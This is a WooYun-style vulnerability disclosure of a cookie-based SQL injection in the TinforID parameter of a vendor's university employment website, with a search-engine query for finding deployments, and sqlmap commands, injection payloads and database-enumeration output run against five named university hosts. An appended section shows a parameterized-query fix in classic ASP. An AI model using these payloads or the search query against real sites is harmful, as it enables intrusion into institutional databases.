
Vulnerability summary

Defect ID: wooyun-2014-080434

Title: Generic cookie-based SQL injection in a university employment information service system

Vendor: 上海甲鼎 (Shanghai Jiading)

Author: error

Submitted: 2014-10-23 11:09

Fixed: 2015-04-02 11:06

Published: 2015-04-02 11:06

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 18

Status: handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org



Vulnerability details

Disclosure status:

2014-10-23: details sent to the vendor, awaiting vendor action
2014-10-28: vendor actively ignored the vulnerability; details opened to third-party security partners
2014-12-22: details opened to core white hats and experts in the relevant field
2015-01-01: details opened to regular white hats
2015-01-11: details opened to intern white hats
2015-04-02: details opened to the public

Brief description:

Generic cookie-based SQL injection in a university employment information service system

Detailed description:

Jiading university employment information service system
NewsList.asp?TinforID
http://www.infojiading.cn/
Reference deployment:
http://www.infojiading.cn/Information.asp?TParentColumnId=0003
Baidu search: site:edu.cn 版权所有 技术支持:上海甲鼎

(screenshot: 1.png)


Injection URL: /NewsList.asp
Injection parameter: TinforID (sent in the Cookie header)

Proof of vulnerability:

(1) http://job.sicfl.edu.cn/
$ py sqlmap.py -u http://jy.shutcm.edu.cn/NewsList.asp --cookie="TinforID=1111" --level 5 --risk 3 --dbs -v 1
---
Place: Cookie
Parameter: TinforID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: TinforID=154' AND 2655=2655 AND 'EGSS'='EGSS
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: TinforID=154'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: TinforID=154' WAITFOR DELAY '0:0:5'--
---
[14:23:13] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[14:23:13] [INFO] fetching database names
[14:23:13] [INFO] fetching number of databases
[14:23:13] [INFO] resumed: 7
[14:23:13] [INFO] resumed: AadmissionsOffice
[14:23:13] [INFO] resumed: Graduate&Management
[14:23:13] [INFO] resumed: IJCenterOfCareer
[14:23:13] [INFO] resumed: master
[14:23:13] [INFO] resumed: model
[14:23:13] [INFO] resumed: msdb
[14:23:13] [INFO] resumed: tempdb
available databases [7]:
[*] [Graduate&Management]
[*] AadmissionsOffice
[*] IJCenterOfCareer
[*] master
[*] model
[*] msdb
[*] tempdb

(screenshot: 1.png)


(2) http://jy.shutcm.edu.cn/NewsList.asp
$ py sqlmap.py -u http://jy.shutcm.edu.cn/NewsList.asp --cookie="TinforID=1111" --level 5 --risk 3 --dbs -v 1
---
Place: Cookie
Parameter: TinforID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: TinforID=154' AND 2655=2655 AND 'EGSS'='EGSS
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: TinforID=154'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: TinforID=154' WAITFOR DELAY '0:0:5'--
---
[14:35:18] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[14:35:18] [INFO] fetching database names
[14:35:18] [INFO] fetching number of databases
[14:35:18] [INFO] resumed: 7
[14:35:18] [INFO] resumed: AadmissionsOffice
[14:35:18] [INFO] resumed: Graduate&Management
[14:35:18] [INFO] resumed: IJCenterOfCareer
[14:35:18] [INFO] resumed: master
[14:35:18] [INFO] resumed: model
[14:35:18] [INFO] resumed: msdb
[14:35:18] [INFO] resumed: tempdb
available databases [7]:
[*] [Graduate&Management]
[*] AadmissionsOffice
[*] IJCenterOfCareer
[*] master
[*] model
[*] msdb
[*] tempdb

(screenshot: 2.png)


(3) http://job.smic.edu.cn/NewsList.asp
$ py sqlmap.py -u http://job.smic.edu.cn/NewsList.asp --cookie="TinforID=1111" --level 5 --risk 3 --dbs -v 1
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end u
[*] starting at 15:12:08
[15:12:08] [INFO] resuming back-end DBMS 'microsoft sql server'
[15:12:08] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: Cookie
Parameter: TinforID
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: TinforID=-2964' OR (1859=1859) AND 'BIWo'='BIWo
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: TinforID=-7641' OR 4526=CONVERT(INT,(SELECT CHAR(113)+CHAR(115)+CHAR(120)+CHAR(114)+CHAR(113)+(SELECT (
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: TinforID=1111'; WAITFOR DELAY '0:0:5'--
---
[15:12:09] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[15:12:09] [INFO] fetching database names
[15:12:09] [INFO] the SQL query used returns 10 entries
[15:12:09] [INFO] resumed: Graduate&Management
[15:12:09] [INFO] resumed: IJCenterOfCareer
[15:12:09] [INFO] resumed: master
[15:12:09] [INFO] resumed: model
[15:12:09] [INFO] resumed: msdb
[15:12:09] [INFO] resumed: Northwind
[15:12:09] [INFO] resumed: pubs
[15:12:09] [INFO] resumed: tempdb
[15:12:09] [INFO] resumed: xuegong
[15:12:09] [INFO] resumed: xuegongtest
available databases [10]:
[*] Graduate&Management
[*] IJCenterOfCareer
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] xuegong
[*] xuegongtest

(screenshot: 3.png)


(4) http://jyxx.shumc.edu.cn
$ py sqlmap.py -u http://jyxx.shumc.edu.cn/NewsList.asp --cookie="TinforID=1111" --level 5 --risk 3 --dbs -v 0
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end
[*] starting at 15:23:54
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: Cookie
Parameter: TinforID
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: TinforID=-6512' OR (3928=3928) AND 'ouRE'='ouRE
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: TinforID=-5592' OR 8926=CONVERT(INT,(SELECT CHAR(113)+CHAR(111)+CHAR(109)+CHAR(109)+CHAR(113)+(SELECT
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: TinforID=1111'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: TinforID=-8878' OR 7647=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysu
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[15:23:54] [INFO] resumed: Graduate&Management
[15:23:54] [INFO] resumed: IJCenterOfCareer
[15:23:54] [INFO] resumed: master
[15:23:54] [INFO] resumed: model
[15:23:54] [INFO] resumed: msdb
[15:23:54] [INFO] resumed: ReportServer$sql2005
[15:23:54] [INFO] resumed: ReportServer$sql2005TempDB
[15:23:54] [INFO] resumed: tempdb
[15:23:54] [INFO] resumed: Trans
[15:23:54] [INFO] resumed: Trans2
[15:23:54] [INFO] resumed: yuanl
available databases [11]:
[*] Graduate&Management
[*] IJCenterOfCareer
[*] master
[*] model
[*] msdb
[*] ReportServer$sql2005
[*] ReportServer$sql2005TempDB
[*] tempdb
[*] Trans
[*] Trans2
[*] yuanl

(screenshot: 4.png)


(5) http://jy.sthu.edu.cn/
$ py sqlmap.py -u http://jy.sthu.edu.cn/NewsList.asp --cookie="TinforID=1111" --level 5 --risk 3 --dbs -v 1
---
Place: Cookie
Parameter: TinforID
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: TinforID=-1870' OR (6515=6515) AND 'whCL'='whCL
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: TinforID=-5376' OR 9872=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(104)+CHAR(110)+CHAR(113)+(SELECT
---
[21:47:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2005
[21:47:43] [INFO] fetching database names
[21:47:43] [INFO] the SQL query used returns 6 entries
[21:47:43] [INFO] resumed: Graduate&Management
[21:47:43] [INFO] resumed: IJCenterOfCareer
[21:47:43] [INFO] resumed: master
[21:47:43] [INFO] resumed: model
[21:47:43] [INFO] resumed: msdb
[21:47:43] [INFO] resumed: tempdb
available databases [6]:
[*] Graduate&Management
[*] IJCenterOfCareer
[*] master
[*] model
[*] msdb
[*] tempdb

(screenshot: 5.png)

Fix recommendation:

Filter the input.

Copyright notice: please credit the source when reposting: error@WooYun
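An added example, not code from the report or from the vendor: what "filter" amounts to for the NewsList.asp lookup in classic ASP, with allow-list validation of the TinforID cookie followed by a parameterized ADODB query against SQL Server. The table and column names, the connection string and the assumption that TinforID is a short numeric string are placeholders; none of them appear on the page.

```asp
<%
Option Explicit
' Added example, not the vendor's code. NewsList.asp reads TinforID from the request cookie
' and uses it in a SQL Server query. The vulnerable form implied by the sqlmap output is:
'   sql = "SELECT ... FROM News WHERE TinforID='" & Request.Cookies("TinforID") & "'"
' The hardened form below validates the value and binds it as a query parameter.
Dim tinforId, re, conn, cmd, rs

tinforId = Request.Cookies("TinforID")

' 1. Allow-list validation. Assumption: a TinforID is a numeric string of at most 10 digits,
'    so quotes, semicolons and WAITFOR/CONVERT payloads are rejected before any SQL is built.
Set re = New RegExp
re.Pattern = "^\d{1,10}$"
If Not re.Test(tinforId) Then
    Response.Status = "400 Bad Request"
    Response.Write "Invalid TinforID"
    Response.End
End If

' 2. Parameterized query via ADODB.Command. The connection string, table and column names
'    are placeholders; the real ones are not on the page.
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open Application("ConnStr")   ' placeholder connection string stored at app start

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = 1                ' adCmdText
cmd.CommandText = "SELECT Title, PubDate FROM News WHERE TinforID = ?"
' CreateParameter(Name, Type, Direction, Size, Value): 200 = adVarChar, 1 = adParamInput.
' The value travels as data, so a quote in the cookie cannot terminate the string literal.
cmd.Parameters.Append cmd.CreateParameter("@TinforID", 200, 1, 10, tinforId)

Set rs = cmd.Execute
Do While Not rs.EOF
    ' Encode output so a stored title cannot inject HTML either.
    Response.Write Server.HTMLEncode(rs("Title")) & "<br>"
    rs.MoveNext
Loop
rs.Close
conn.Close
%>
```

Because the parameter is bound rather than concatenated, every payload class in the sqlmap output above (boolean-based, error-based via CONVERT, stacked WAITFOR DELAY) is treated as a literal string value and never reaches the parser as SQL.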


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2015-04-02 11:06

Vendor reply:

Latest status:

None yet

